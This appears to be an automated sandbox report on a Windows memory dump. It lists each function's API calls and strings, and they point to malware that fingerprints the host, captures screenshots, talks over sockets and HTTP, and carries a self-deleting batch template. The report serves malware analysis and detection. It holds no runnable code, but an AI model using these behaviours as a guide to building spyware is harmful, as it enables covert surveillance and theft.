VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 02824B77

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0282B70A, Relevance: 9.4, APIs: 5, Instructions: 89

APIs

Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282439E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI ref: 028243A8
Part of subcall function 0282432D: memcpy.MSVCRT ref: 028243F1
Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282441E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI(?), ref: 02824428

CreateDirectoryW.KERNEL32(?,00000000), ref: 0282B783
SetFileAttributesW.KERNEL32(?), ref: 0282B7A2
CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,?,00000000), ref: 0282B7B9
GetLastError.KERNEL32(?,00000002,?,?), ref: 0282B7C6
CloseHandle.KERNEL32 ref: 0282B7FF

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02815C67, Relevance: 9.1, APIs: 5, Instructions: 49

APIs

EnterCriticalSection.KERNEL32(02991F34,?,?,00000001,02824EA8,?,?,00000001), ref: 02815C70
LeaveCriticalSection.KERNEL32(02991F34,?,00000001,02824EA8,?,?,00000001), ref: 02815C7A
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 02815CA0
EnterCriticalSection.KERNEL32(02991F34,?,00000001,02824EA8,?,?,00000001), ref: 02815CB8
LeaveCriticalSection.KERNEL32(02991F34,?,00000001,02824EA8,?,?,00000001), ref: 02815CC2

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028149D7, Relevance: 9.1, APIs: 6, Instructions: 145

APIs

memset.MSVCRT ref: 02814A18

Part of subcall function 02833D5A: memcpy.MSVCRT ref: 02833D94

CharLowerW.USER32 ref: 02814A5C
CharUpperW.USER32(?,?,00000001), ref: 02814A6D
CharLowerW.USER32 ref: 02814A81
CharUpperW.USER32(?,00000001), ref: 02814A8B
memcmp.MSVCRT ref: 02814AA0

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02817B1D, Relevance: 9.1, APIs: 6, Instructions: 141

APIs

Part of subcall function 0281568C: TlsSetValue.KERNEL32(00000001,0281E1BD), ref: 02815699

Part of subcall function 0280F99C: ResetEvent.KERNEL32 ref: 0280F9B8

WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 02817B63
WSAGetLastError.WS2_32(?,?,?,00000000,?,00000000), ref: 02817B6D
WSAGetLastError.WS2_32(?,?,?,00000000,?,00000000), ref: 02817C76
WSAGetLastError.WS2_32(?,?,?,00000000,?,00000000), ref: 02817C7F
UnregisterWait.KERNEL32(?), ref: 02817CA4
TlsSetValue.KERNEL32(00000000), ref: 02817CCF

Part of subcall function 0280F9C5: memcpy.MSVCRT ref: 0280F9DA
Part of subcall function 0280F9C5: SetEvent.KERNEL32 ref: 0280F9EA

Part of subcall function 0280F825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 0280F82D

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0282BC3E, Relevance: 9.1, APIs: 5, Instructions: 172

APIs

memset.MSVCRT ref: 0282BC73
GetComputerNameW.KERNEL32(?,?), ref: 0282BCA7
GetVersionExW.KERNEL32(?), ref: 0282BCD0
memset.MSVCRT ref: 0282BCEF

Part of subcall function 02820D39: RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 02820D60

Part of subcall function 02820D19: RegFlushKey.ADVAPI32 ref: 02820D29
Part of subcall function 02820D19: RegCloseKey.ADVAPI32 ref: 02820D31

Part of subcall function 02809A5B: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 02809ACA
Part of subcall function 02809A5B: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 02809AEF

memset.MSVCRT ref: 0282BDF4

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Part of subcall function 02809A2A: CryptDestroyHash.ADVAPI32 ref: 02809A42
Part of subcall function 02809A2A: CryptReleaseContext.ADVAPI32(?,00000000), ref: 02809A53

Part of subcall function 02809B02: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 02809B41

Part of subcall function 02820FD5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,0282BD4B,?), ref: 02820FF2

Part of subcall function 02820E64: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 02820EBF

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0281D694, Relevance: 9.1, APIs: 6, Instructions: 79

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00000004,0281D7B9,00000000,?,?,?,?,?,?,0281C499,?,00000000), ref: 0281D69E
HeapCreate.KERNEL32(00040001,00000000,00000000), ref: 0281D6DB
HeapAlloc.KERNEL32(?,00000000,0000000B,?,?,?,?,00000004,0281D7B9,00000000), ref: 0281D6F8
HeapFree.KERNEL32(?,00000000,?,?,00000000,0000000B,?,?,?,?,00000004,0281D7B9,00000000), ref: 0281D720
memcpy.MSVCRT ref: 0281D730

Part of subcall function 0281599B: EnterCriticalSection.KERNEL32(028427DC,00000000,0280D9CE,02991E90,?,?,?,02811992,?,?,?,?,028248EB,?,?,00000000), ref: 028159A7
Part of subcall function 0281599B: LeaveCriticalSection.KERNEL32(028427DC,?,?,?,02811992,?,?,?,?,028248EB,?,?,00000000), ref: 028159B7

Part of subcall function 028109C2: GetCurrentThreadId.KERNEL32 ref: 028109D3
Part of subcall function 028109C2: memcpy.MSVCRT ref: 02810B42
Part of subcall function 028109C2: memset.MSVCRT ref: 02810BA8
Part of subcall function 028109C2: VirtualProtect.KERNEL32(?,?,00000040,?), ref: 02810BBD
Part of subcall function 028109C2: GetLastError.KERNEL32(?,00000040,?,?,?,00000000), ref: 02810BC7

Part of subcall function 028159C5: LeaveCriticalSection.KERNEL32(028427DC,02815A45,00000002,?,?,?,0280DAA2,00000002,00000001,000000FF), ref: 028159CF

Part of subcall function 028159D6: LeaveCriticalSection.KERNEL32(028427DC,?,0280D9F7,00000009,02991E90,?,?,?,02811992,?,?,?,?,028248EB), ref: 028159E3

LeaveCriticalSection.KERNEL32(?,?,00000000,0000000B,?,?,?,?,00000004,0281D7B9,00000000), ref: 0281D774

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02835BA7, Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 72

APIs

lstrcmpA.KERNEL32(?,?\C), ref: 02835BC4
lstrcpyW.KERNEL32(0283597D), ref: 02835BD6
lstrcmpA.KERNEL32(?,0280939C), ref: 02835BE9
StrCmpNA.SHLWAPI(?,02809394,00000002), ref: 02835BFF
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000104), ref: 02835C2A

Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282439E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI ref: 028243A8
Part of subcall function 0282432D: memcpy.MSVCRT ref: 028243F1
Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282441E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI(?), ref: 02824428

Strings

?\C, xrefs: 02835BBC

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280C41C, Relevance: 9.1, APIs: 5, Instructions: 137

APIs

EnterCriticalSection.KERNEL32(?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 0280C44D

Part of subcall function 0282D0A9: WaitForSingleObject.KERNEL32(?,00000000), ref: 0282D0B5

WSAGetLastError.WS2_32(?,?,?,?,?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 0280C4DF

Part of subcall function 0280BFFE: getsockopt.WS2_32(?,0000FFFF,00001008,?,?), ref: 0280C08A
Part of subcall function 0280BFFE: GetHandleInformation.KERNEL32(?,?), ref: 0280C09C
Part of subcall function 0280BFFE: socket.WS2_32(?,00000001,00000006), ref: 0280C0CF
Part of subcall function 0280BFFE: socket.WS2_32(?,00000002,00000011), ref: 0280C0E0
Part of subcall function 0280BFFE: closesocket.WS2_32(00000002), ref: 0280C0FF
Part of subcall function 0280BFFE: closesocket.WS2_32 ref: 0280C106
Part of subcall function 0280BFFE: memset.MSVCRT ref: 0280C1C8
Part of subcall function 0280BFFE: memcpy.MSVCRT ref: 0280C3C8

SetEvent.KERNEL32 ref: 0280C532
SetEvent.KERNEL32 ref: 0280C56B

Part of subcall function 0282D090: SetEvent.KERNEL32 ref: 0282D0A0

Part of subcall function 0280F825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 0280F82D

LeaveCriticalSection.KERNEL32(?,?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 0280C5F0

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028253C3, Relevance: 9.1, APIs: 6, Instructions: 61

APIs

Part of subcall function 028248F2: GetModuleHandleW.KERNEL32 ref: 02824932
Part of subcall function 028248F2: WSAStartup.WS2_32(00000202,?), ref: 02824998
Part of subcall function 028248F2: CreateEventW.KERNEL32(02842974,00000001), ref: 028249BA
Part of subcall function 028248F2: GetLengthSid.ADVAPI32(?,?,?,00000001), ref: 028249EC
Part of subcall function 028248F2: GetCurrentProcessId.KERNEL32 ref: 02824A17

SetErrorMode.KERNEL32(00008007), ref: 028253DC
GetCommandLineW.KERNEL32 ref: 028253E8
CommandLineToArgvW.SHELL32 ref: 028253EF
LocalFree.KERNEL32 ref: 0282542C
ExitProcess.KERNEL32(00000001), ref: 0282543D

Part of subcall function 02825087: CreateMutexW.KERNEL32(02842974,00000001,?), ref: 0282512D
Part of subcall function 02825087: GetLastError.KERNEL32(?,?,00000001,?,?,?,02825452), ref: 0282513D
Part of subcall function 02825087: CloseHandle.KERNEL32 ref: 0282514B
Part of subcall function 02825087: lstrlenW.KERNEL32(?), ref: 028251AD
Part of subcall function 02825087: ExitWindowsEx.USER32(00000014,80000000), ref: 028251DD
Part of subcall function 02825087: OpenEventW.KERNEL32(00000002,00000000,?), ref: 02825203
Part of subcall function 02825087: SetEvent.KERNEL32 ref: 02825210
Part of subcall function 02825087: CloseHandle.KERNEL32 ref: 02825217
Part of subcall function 02825087: CloseHandle.KERNEL32 ref: 02825229
Part of subcall function 02825087: IsWellKnownSid.ADVAPI32(02991EC0,00000016), ref: 02825279
Part of subcall function 02825087: CreateEventW.KERNEL32(02842974,00000001,00000000,?), ref: 02825348
Part of subcall function 02825087: WaitForSingleObject.KERNEL32(?,000000FF), ref: 02825361
Part of subcall function 02825087: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02825373
Part of subcall function 02825087: CloseHandle.KERNEL32(00000000), ref: 0282538A
Part of subcall function 02825087: CloseHandle.KERNEL32(?), ref: 02825390
Part of subcall function 02825087: CloseHandle.KERNEL32(?), ref: 02825396

Sleep.KERNEL32(000000FF), ref: 02825463

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0282027E, Relevance: 9.0, APIs: 5, Instructions: 119

APIs

#8.OLEAUT32(?,?,02801618,?,?,00000000,?,00000000,?,00000000,?,00000000), ref: 02820301

Part of subcall function 02811BDD: #6.OLEAUT32 ref: 02811BE7
Part of subcall function 02811BDD: #2.OLEAUT32(ProhibitDTD), ref: 02811BF5

#6.OLEAUT32(00000000,?,02801618,?,?,00000000,?,00000000,?,00000000,?,00000000), ref: 02820350
#8.OLEAUT32(?), ref: 0282035B
#2.OLEAUT32(?), ref: 0282036D
#9.OLEAUT32(?), ref: 028203A4

Part of subcall function 028307B1: CoCreateInstance.OLE32(028017F8,00000000,00004401,02801858,?), ref: 028307C6

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02819925, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 71

APIs

memcpy.MSVCRT ref: 0281993C

Part of subcall function 02809F72: memcpy.MSVCRT ref: 02809F80

memcmp.MSVCRT ref: 0281995E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 0281998C

Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282439E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI ref: 028243A8
Part of subcall function 0282432D: memcpy.MSVCRT ref: 028243F1
Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282441E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI(?), ref: 02824428

lstrcmpiW.KERNEL32(?), ref: 028199DC

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 028199AD

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02832B3C, Relevance: 9.0, APIs: 5, Instructions: 69

APIs

Part of subcall function 028327C1: socket.WS2_32(?,?,00000006), ref: 028327F5

connect.WS2_32(?,?), ref: 02832B7A
WSAGetLastError.WS2_32(?,00000000,00000000), ref: 02832B89
WSASetLastError.WS2_32(?), ref: 02832BE7

Part of subcall function 02832968: shutdown.WS2_32(?,00000002), ref: 02832976
Part of subcall function 02832968: closesocket.WS2_32(?), ref: 0283297F
Part of subcall function 02832968: WSACloseEvent.WS2_32(?), ref: 02832992

Part of subcall function 02832917: WSACreateEvent.WS2_32(00000000,?,02832C15,?,00000000,?,02832CD1,?,?,?,?,00000000), ref: 0283292D
Part of subcall function 02832917: WSAEventSelect.WS2_32(?,?,02832CD1), ref: 02832943
Part of subcall function 02832917: WSACloseEvent.WS2_32(?), ref: 02832957

WSASetLastError.WS2_32 ref: 02832BA7
WSAGetLastError.WS2_32 ref: 02832BA9

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02811791, Relevance: 9.0, APIs: 5, Instructions: 66

APIs

InitializeCriticalSection.KERNEL32(02843510), ref: 028117B1

Part of subcall function 02816997: HeapAlloc.KERNEL32(00000000,00000024,?,028117BF,?,00000000,02824986,?,?,00000001), ref: 028169A8

InitializeCriticalSection.KERNEL32 ref: 028117C6
memset.MSVCRT ref: 028117DB
TlsAlloc.KERNEL32(?,00000000,02824986,?,?,00000001), ref: 028117F2
GetModuleHandleW.KERNEL32(?), ref: 02811817

Part of subcall function 02818DB0: EnterCriticalSection.KERNEL32(02843510,02991E90,02811829,?,00000000,02824986,?,?,00000001), ref: 02818DC0
Part of subcall function 02818DB0: LeaveCriticalSection.KERNEL32(02843510,?,00000000,02824986,?,?,00000001), ref: 02818DE8

Part of subcall function 02811857: TlsFree.KERNEL32(00000026), ref: 02811863
Part of subcall function 02811857: DeleteCriticalSection.KERNEL32(02991E90,00000000,02811851,02991E90,?,00000000,02824986,?,?,00000001), ref: 0281186A

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02820799, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72

APIs

Part of subcall function 02809F72: memcpy.MSVCRT ref: 02809F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 028207CF

Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282439E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI ref: 028243A8
Part of subcall function 0282432D: memcpy.MSVCRT ref: 028243F1
Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282441E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI(?), ref: 02824428

lstrcatW.KERNEL32(?,.dat), ref: 0282082F
lstrlenW.KERNEL32 ref: 02820844

Part of subcall function 02811AAE: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 02811ACA
Part of subcall function 02811AAE: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02811AED
Part of subcall function 02811AAE: CloseHandle.KERNEL32 ref: 02811AFA

Part of subcall function 0280E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 0280E82F
Part of subcall function 0280E826: DeleteFileW.KERNEL32(?), ref: 0280E836

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 028207F0
.dat, xrefs: 02820823

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028307DB, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71

APIs

InternetSetOptionA.WININET(?,00000003,02806FA4,00000004), ref: 02830805

Part of subcall function 02826FD3: EnterCriticalSection.KERNEL32(02843510,?,02824693,?,028249A5,?,?,00000001), ref: 02826FE3
Part of subcall function 02826FD3: LeaveCriticalSection.KERNEL32(02843510,?,02824693,?,028249A5,?,?,00000001), ref: 02827009

GetAcceptLanguagesA.SHLWAPI ref: 0283084C
memcpy.MSVCRT ref: 02830886
HttpAddRequestHeadersA.WININET(?,?,?,A0000000), ref: 028308BF

Strings

Accept-Language: , xrefs: 02830880

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280AD53, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49

APIs

Part of subcall function 02826FD3: EnterCriticalSection.KERNEL32(02843510,?,02824693,?,028249A5,?,?,00000001), ref: 02826FE3
Part of subcall function 02826FD3: LeaveCriticalSection.KERNEL32(02843510,?,02824693,?,028249A5,?,?,00000001), ref: 02827009

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0280ADA3
GetProcAddress.KERNEL32(?,GetProductInfo), ref: 0280ADB3
GetSystemDefaultUILanguage.KERNEL32(?,0280AA9B), ref: 0280ADEE

Strings

kernel32.dll, xrefs: 0280AD9E
GetProductInfo, xrefs: 0280ADAD

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02835D27, Relevance: 8.3, APIs: 3, Strings: 1, Instructions: 81

APIs

GetTempPathW.KERNEL32(00000104), ref: 02835D3A
lstrcpyA.KERNEL32(?,0280939A,00000000,02835FC9,?,?,?,02835FC9,?,?,?,?,?,?,?,0281BD61), ref: 02835DD1
lstrcpynA.KERNEL32(?,?\C,00000003,?,0280939A,00000000,02835FC9,?,?,?,02835FC9,?), ref: 02835DE7

Strings

?\C, xrefs: 02835DDC

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280D2F7, Relevance: 8.3, APIs: 2, Strings: 2, Instructions: 77

APIs

VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?), ref: 0280D315
VerQueryValueW.VERSION(?,?,?,?), ref: 0280D382

Part of subcall function 02833C83: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 02833C98
Part of subcall function 02833C83: StrCmpIW.SHLWAPI(?,?), ref: 02833CA2

Strings

\VarFileInfo\Translation, xrefs: 0280D30A
\StringFileInfo\%04x%04x\%s, xrefs: 0280D357

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0281332C, Relevance: 8.2, APIs: 2, Strings: 2, Instructions: 44

APIs

GetProcAddress.KERNEL32(?,GdipCreateBitmapFromHBITMAP), ref: 02813341
GetProcAddress.KERNEL32(?,GdipDisposeImage), ref: 0281334C

Part of subcall function 0281338D: GetProcAddress.KERNEL32(?,GdipGetImageEncodersSize), ref: 028133AB
Part of subcall function 0281338D: GetProcAddress.KERNEL32(?,GdipGetImageEncoders), ref: 028133B6
Part of subcall function 0281338D: GetProcAddress.KERNEL32(?,GdipSaveImageToStream), ref: 028133C1
Part of subcall function 0281338D: lstrcmpiW.KERNEL32(?), ref: 0281344E
Part of subcall function 0281338D: memcpy.MSVCRT ref: 02813471
Part of subcall function 0281338D: CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0281349C
Part of subcall function 0281338D: memcpy.MSVCRT ref: 028134CA

Strings

GdipCreateBitmapFromHBITMAP, xrefs: 0281333A
GdipDisposeImage, xrefs: 02813343

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02815A4F, Relevance: 8.0, APIs: 4, Instructions: 27

APIs

GetLastError.KERNEL32(?,?,0280B9B4), ref: 02815A51

Part of subcall function 02824B8D: WaitForSingleObject.KERNEL32(00000000,0281E1D7), ref: 02824B95

TlsGetValue.KERNEL32(?,?,0280B9B4), ref: 02815A6E
TlsSetValue.KERNEL32(00000001), ref: 02815A80
SetLastError.KERNEL32(?,?,0280B9B4), ref: 02815A90

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280CD5A, Relevance: 7.9, APIs: 5, Instructions: 109

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,02813FA1), ref: 0280CD70
LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,02813FA1), ref: 0280CE9F

Part of subcall function 0280F0E1: memcmp.MSVCRT ref: 0280F0FD

memcpy.MSVCRT ref: 0280CDCD
LeaveCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,02813FA1,?,00000002), ref: 0280CDDD

Part of subcall function 0283046D: EnterCriticalSection.KERNEL32(028430F4,?,?,0280E3BD,00000000,?,?,00000001), ref: 0283047A
Part of subcall function 0283046D: LeaveCriticalSection.KERNEL32(028430F4,?,?,0280E3BD,00000000,?,?,00000001), ref: 02830488

EnterCriticalSection.KERNEL32(?,?,00000000,00000000,-00001388,?,00000000,00000000), ref: 0280CE11

Part of subcall function 0282D95F: GetSystemTime.KERNEL32(?), ref: 0282D969

Part of subcall function 0280EDAE: memcpy.MSVCRT ref: 0280EDF9

Part of subcall function 0280EEE2: memcpy.MSVCRT ref: 0280EFC1
Part of subcall function 0280EEE2: memcpy.MSVCRT ref: 0280EFE2

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02826C9A, Relevance: 7.9, APIs: 5, Instructions: 252

APIs

memcmp.MSVCRT ref: 02826D07
memcpy.MSVCRT ref: 02826E14

Part of subcall function 02832B3C: connect.WS2_32(?,?), ref: 02832B7A
Part of subcall function 02832B3C: WSAGetLastError.WS2_32(?,00000000,00000000), ref: 02832B89
Part of subcall function 02832B3C: WSASetLastError.WS2_32 ref: 02832BA7
Part of subcall function 02832B3C: WSAGetLastError.WS2_32 ref: 02832BA9
Part of subcall function 02832B3C: WSASetLastError.WS2_32(?), ref: 02832BE7

memcmp.MSVCRT ref: 02826F11

Part of subcall function 02832EA3: WSAGetLastError.WS2_32(?,?,?,?,?,?,0280FD6D,?,00000004,00007530,?,?,?,?), ref: 02832ED9
Part of subcall function 02832EA3: WSASetLastError.WS2_32(?), ref: 02832F21

Part of subcall function 02826A51: memcmp.MSVCRT ref: 02826A97

Part of subcall function 02825D47: memset.MSVCRT ref: 02825D57
Part of subcall function 02825D47: memcpy.MSVCRT ref: 02825D80

memset.MSVCRT ref: 02826F76
memcpy.MSVCRT ref: 02826F87

Part of subcall function 02825D97: memcpy.MSVCRT ref: 02825DA8

Part of subcall function 028269A2: memcmp.MSVCRT ref: 028269DE

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Part of subcall function 028169B0: HeapAlloc.KERNEL32(00000008,?,?,0281519B,?,?,?,?,028246A1,?,028249A5,?,?,00000001), ref: 028169C1

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280D6C8, Relevance: 7.9, APIs: 5, Instructions: 86

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,0280D979,00000001,?,00000000,?,?,?,00000000,00000000), ref: 0280D6D2
memcpy.MSVCRT ref: 0280D74E
memcpy.MSVCRT ref: 0280D762
memcpy.MSVCRT ref: 0280D78C
LeaveCriticalSection.KERNEL32(?,?,?,00000001,?,?,?,?,0280D979,00000001,?,00000000,?,?,?,00000000), ref: 0280D7B2

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0282B562, Relevance: 7.8, APIs: 5, Instructions: 133

APIs

memset.MSVCRT ref: 0282B587
memcpy.MSVCRT ref: 0282B5E7
memcpy.MSVCRT ref: 0282B5FF

Part of subcall function 02809F94: memset.MSVCRT ref: 02809FA8

Part of subcall function 0281BD8C: memset.MSVCRT ref: 0281BE17

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000104), ref: 0282B66A
memcpy.MSVCRT ref: 0282B6A8

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02816D60, Relevance: 7.8, APIs: 4, Instructions: 68

APIs

select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 02816D88
recv.WS2_32(?,?,00000400,00000000), ref: 02816DB4
send.WS2_32(?,?,?,00000000), ref: 02816DD6
select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 02816E03

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280C907, Relevance: 7.8, APIs: 4, Instructions: 66

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,00000001,?,00000000,0280CB5E,?), ref: 0280C961
LeaveCriticalSection.KERNEL32(?,?,?,00000002,00000001,?,00000000,0280CB5E,?), ref: 0280C9C9

Part of subcall function 0280C3F3: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0280C404

Part of subcall function 02816A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,0282CB50,?,00000000,00000001,00000001,0282CB1A,?,028154E4,?,@echo off%sdel /F "%s",?,?), ref: 02816A43
Part of subcall function 02816A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0282CB50,?,00000000,00000001,00000001,0282CB1A,?,028154E4,?,@echo off%sdel /F "%s",?), ref: 02816A56

InterlockedIncrement.KERNEL32 ref: 0280C99E
SetEvent.KERNEL32 ref: 0280C9BC

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02815B40, Relevance: 7.7, APIs: 4, Instructions: 47

APIs

EnterCriticalSection.KERNEL32(?,7C809F91,?,0280D091,?,?,00000000,0000EA60,00000000), ref: 02815B48
WaitForSingleObject.KERNEL32(?,00000000), ref: 02815B6C
CloseHandle.KERNEL32 ref: 02815B7C

Part of subcall function 028169C9: HeapAlloc.KERNEL32(00000000,?,?,02834E9D,02809851,?,?,02834FB1,?,?,?,?,?,?,?,?), ref: 028169F3
Part of subcall function 028169C9: HeapReAlloc.KERNEL32(00000000,?,?,?,02834E9D,02809851,?,?,02834FB1,?,?,?,?,?,?), ref: 02816A06

LeaveCriticalSection.KERNEL32(?,?,7C809F91,?,0280D091,?,?,00000000,0000EA60,00000000), ref: 02815BAC

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02818459, Relevance: 7.7, APIs: 4, Instructions: 207

APIs

EnterCriticalSection.KERNEL32(029927FC,3D920700), ref: 028184C0

Part of subcall function 028181D6: GetTickCount.KERNEL32 ref: 028181DE

LeaveCriticalSection.KERNEL32(029927FC), ref: 0281869F

Part of subcall function 02818339: IsBadReadPtr.KERNEL32 ref: 02818405
Part of subcall function 02818339: IsBadReadPtr.KERNEL32 ref: 02818424

getservbyname.WS2_32(?,00000000), ref: 0281853A

Part of subcall function 02818A90: memcpy.MSVCRT ref: 02818C64
Part of subcall function 02818A90: memcpy.MSVCRT ref: 02818D64

Part of subcall function 02818770: memcpy.MSVCRT ref: 02818944
Part of subcall function 02818770: memcpy.MSVCRT ref: 02818A44

memcpy.MSVCRT ref: 02818619

Part of subcall function 02832471: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,02842910,?,?), ref: 0283249E

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Part of subcall function 02818162: TlsAlloc.KERNEL32(029927FC,02818636,?,?,?,?,029927F0,?), ref: 0281816B
Part of subcall function 02818162: TlsGetValue.KERNEL32(?,00000001,029927FC), ref: 0281817D
Part of subcall function 02818162: TlsSetValue.KERNEL32(?,?), ref: 028181C2

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02815E12, Relevance: 7.7, APIs: 5, Instructions: 68

APIs

EnterCriticalSection.KERNEL32(02843510), ref: 02815E33
LeaveCriticalSection.KERNEL32(02843510), ref: 02815E59

Part of subcall function 02815DBC: InitializeCriticalSection.KERNEL32(02843648), ref: 02815DC1
Part of subcall function 02815DBC: memset.MSVCRT ref: 02815DD0

